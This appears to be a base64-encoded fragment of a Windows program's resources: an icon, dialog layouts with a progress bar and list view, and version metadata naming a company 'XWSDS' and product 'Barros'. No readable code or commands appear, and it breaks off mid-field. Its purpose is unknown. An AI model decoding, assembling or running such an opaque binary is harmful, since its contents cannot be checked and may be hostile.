AAAAAAAAAAAAAAAAAC49/1cuQP/7L0D//y9A//8vQP//LkD/+y49/1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9A//8vQP//L0D//y9A//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuPf9XLkD/+y9A//8vQP//L0D//y5A//suPf9XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL0D//y9A//8vQP//L0D//wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALj3/Vy5A//svQP//L0D//y9A//8uQP/7Lj3/VwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvQP//L0D//y9A//8vQP//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC49/1cuQP/7L0D//y9A//8vQP//LkD/+y49/1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9A//8vQP//L0D//y9A//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuPf9XLkD/+y9A//8vQP//L0D//y5A//suPf9XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL0D//y9A//8vQP//L0D//wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALj3/Vy5A//svQP//L0D//y9A//8uQP/7Lj3/VwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvQP//L0D//y9A//8vQP//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC49/1cuQP/7L0D//y9A//8vQP//LkD/+y49/1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4///IvQP//L0D//y9A//8nOv8NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuPf9XLkD/+y9A//8vQP//L0D//y5A//suPf9XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALj//2C9A//8vQP//L0D//y5A/zcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALj3/Vy5A//svQP//L0D//y9A//8uQP/7Lj3/VwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuP/+kL0D//y9A//8vQP//LT//kQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC49/1cuQP/7L0D//y9A//8vQP//LkD/+y49/1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0//1QvQP//L0D//y9A//8uP//4Kj//MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuPf9XLkD/+y9A//8vQP//L0D//y5A//suPf9XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP/BS4//9ovQP//L0D//y9A//8uQP/jKj//MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALz3/Zy5A//svQP//L0D//y9A//8uQP/7Lj3/VwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALT3/Ty4///4vQP//L0D//y9A//8uP//4LT//kS5A/zcnOv8NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wEkPP8VLT7/Ti4//7ovQP//L0D//y9A//8vQP//LkD/+y49/1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALj//iS9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y5A//suPf9XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8CLj//iS4///4vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8uP//wLD7/SgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALT3/Ty4//9ovQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//LT7/ty1B/ycAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP/BS0//1QuP/+kLj//2C4///IvQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//L0D//y9A//8vQP//Lj///S4//+ouP//NLT//jC0//zgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////+AAf/////////////////8AAA/////4AAAAAAAAAAP8AAAD////8AAAAAAAAAAH8AAAAP///8AAAAAAAAAAD+AAAAB////AAAAAAAAAAB/AAAAAP///gD//////////gAAAAB///wH//////////wAAAAAP//8D//////////4AAAAAB///B//////////8AAAAAAP//wf/////////+AAAAAAB//8H//////////gAAAAAAf//D//////////wAAAAAAD//w//////////8AAAAAAA//8P/////////+AAAAAAAH//D//////////gAAAAAAB//w//////////4AAAAAAAf/8P/////////8AAAAAAAD//D//////////AAAAAAAA//w//////////wAAA8AAAP/8P/////////8AAAfgAAD//D//////////AAAH4AAA//w//////////wAAD/AAAP/8P/////////8AAB/4AAD//D//////////AAAf+AAA//w///H//////wAAP/wAAP/8P/+Af/////8AAH/+AAD//D//AB//////AAD//wAA//w//wAP/////wAA//8AAP/8P/8AB/////8AAf//gAD//D//AAf/////AAP//8AA//w//4AD/////4AD///AAf/8P/+AAf////+AB///4AH//D//wAD/////gAP//8AB//w//+AA/////8AD///AA//8P//wAH/////AAA/wAAP//D//+AA/////4AAP8AAH//w///wAP////+AAD/AAB//8P///AB/////wAA/wAA///D///4AP////+AAP8AAf//w////gD/////wAD/AAP//8P///+AP////8AA/wAH///D////4AP///wAAH4AD///w////+AAP//wAAB+AB///8P////wAAP/gAAAGAA////D////+AAAHgADAAAA////w/////gYAAAAPgAAA////8P////8DwAAAAAIAB/////D/////A/gAAAAD///////w/////4H/wAAAB///////8P////+B/8AAAA////////D/////wP+APgD///7////w/////8D/AP/////8////8P/////gfgH/////+P////D/////4HwD//////D////w//////A4B//////w////8P/////wOA//////8P////D/////+BAf//////D////w//////gAP//////w////8P/////8AH//////8P////D//////AB///////D////w//////4A///////w////8P/////+AP//////8P////D//////wH///////D////w//////8B///////w////8P//////A///////8P////D//////wP///////D////w//////8D///////w////8P/////+A///////8P////D//////gP///////D////w//////4D///////w////8P/////+Af//////8P////D//////gH///////D////w//////wB///////w////8P/////8Af//////8P////D//////BH///////D////w//////wR///////g////8P/////8Ef//////4P////D//////BH//////+D////w//////wQ///////g////8P/////8EP//////wP////D//////BD//////4H////w//////wQ//////8B////8P/////8Ef/////+A/////D//////AH//////Af////w//////wB//////gP////8P/////+A//////wH/////D/////////////4D/////w/////////////8B/////8P////////////+A//////D/////////////Af/////w/////////////gP/////8P////////////wH//////D////////////4D//////w////////////8B//////8P///////////+A///////D////////////Af//////w////////////gP//////8P///////////wH///////D///////////4D///////w///////////8B///////8P//////////+A////////D///////////Af///////w///////////gP///////8P//////////wH////////D//////////4D////////w//////////8B////////8P/////////+A/////////D//////////Af////////w//////////gP////////8P/////////wH/////////D/////////4D/////////w/////////8B/////////8P////////+A//////////D/////////Af/////////w/////////gP/////////8H////////wH//////////B////////4D//////////wf///////8B//////////8D///////+A///////////Af///////Af//////////4A//////8AP///////////AAAAAAAAAH///////////wAAAAAAAAD////////////AAAAAAAAB////////////4AAAAAAAB////////////////////////////////////////////////////wEA//8AAAAAAAAAAEgIyoAGAAAAAAAYAaIAAAAAAAAACAAAAAABTQBTACAAUwBoAGUAbABsACAARABsAGcAAAAAAAAAAAAAAAAAA0CrAI4AMgAOAAMAAAD//4AAAAAAAAAAAAAAAAAAAAABUN8AjgAyAA4AAQAAAP//gAAAAAAAAAAAAAAAAAAAAAFQBwCOADIADgACAAAA//+AAAAAAAAAAAAAAAAAABAAAlAHAIoACwEBAP///////4IAAAAAAAAAAAAAAAAABAACQAcABgAKAYIA+gMAAP//ggAAAAAAAAAAAAAAAAABAAJYOwCRAGwACAAEBAAA//+CAAAAAAABAP//AAAAAAAAAABIBABABQAAAAAACgGCAAAAAAAAAAgAAAAAAU0AUwAgAFMAaABlAGwAbAAgAEQAbABnAAAAAAAAAAAAAAAAAIBQGAAKAPEACwDsAwAAbQBzAGMAdABsAHMAXwBwAHIAbwBnAHIAZQBzAHMAMwAyAAAAAAAAAAAAAAAAAAAAjAAAUBgAAADxAAgA7gMAAP//ggAAAAAAAAAAAAAAAAAFQIFAAAAZAAkBaAD4AwAAUwB5AHMATABpAHMAdABWAGkAZQB3ADMAMgAAAAAAAAAAAAAAAAAAAAMAAFAAAAAAFgAUAAcEAAD//4IA//9nAAAAAAAAAAAAAAAAAAAAAFAAABwAPAAOAAMEAAD//4AAAAAAAAAAAAABAP//AAAAAAAAAADICACAAQAAAAAAogAWAAAAAAAAAAgAAAAAAU0AUwAgAFMAaABlAGwAbAAgAEQAbABnAAAAAAAAAAAAAAABAAJQBwAHAJQACAAGBAAA//+CAAAAAAAAAAEAAQCAgAAAAQAgACgIAQABAAAAAAAwAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAAAmAGAABwAmACYAYAAHACYAAAAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAI4BAAAAAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAGoBAAAAADAANAAwADkAMAA0AGIAMAAAACwABgABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAWABXAFMARABTAAAANgAHAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEIAYQByAHIAbwBzAAAAAAA2AAsAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADkANgAuADMAOAAuADMAOAAuADcAAAAAAEoAEwABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaA